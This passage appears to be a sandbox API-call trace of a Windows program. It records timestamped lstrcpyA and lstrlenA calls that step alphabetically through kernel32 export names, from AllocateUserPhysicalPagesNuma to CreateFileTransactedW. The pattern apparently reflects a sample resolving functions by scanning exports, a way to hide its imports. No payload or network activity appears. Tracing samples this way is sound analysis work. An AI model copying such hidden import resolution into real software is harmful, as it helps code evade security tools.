lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.654] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.654] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.654] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.654] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.655] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.655] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.655] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.655] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.655] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.655] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.655] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.655] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.655] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.655] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.655] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.656] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.656] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.656] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.656] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.656] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.656] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.656] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.656] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.656] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.656] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.656] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.656] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.656] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.656] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.656] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.656] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.656] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.656] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.656] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.657] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.657] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.657] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.657] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.657] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.657] lstrlenA (lpString="BEEP") returned 4 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.657] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.657] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.657] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.657] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.657] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.657] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.657] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.657] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.657] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.657] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.657] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.657] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.658] lstrlenA (lpString="CANCELIO") returned 8 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.658] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.658] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.658] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.658] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.658] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.658] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.658] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.658] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.658] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.658] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.658] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.658] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.658] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.658] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.658] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.658] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.658] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.658] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.658] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.659] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.659] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.659] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.659] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.659] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.659] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.659] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.659] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.659] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.659] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.659] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.659] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.659] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.659] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.659] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.660] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.660] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.660] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.660] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.660] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.660] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.660] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.660] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.660] lstrlenA (lpString="COPYFILEA") returned 9 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.660] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.660] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.660] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.660] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.660] lstrlenA (lpString="COPYFILEW") returned 9 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.660] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.660] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.660] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.660] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.660] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.661] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.661] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.661] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.661] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.661] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.661] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.661] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.661] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.661] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.661] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.661] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.661] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.661] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.661] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.661] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.661] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.661] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.661] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.661] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.661] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.662] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") 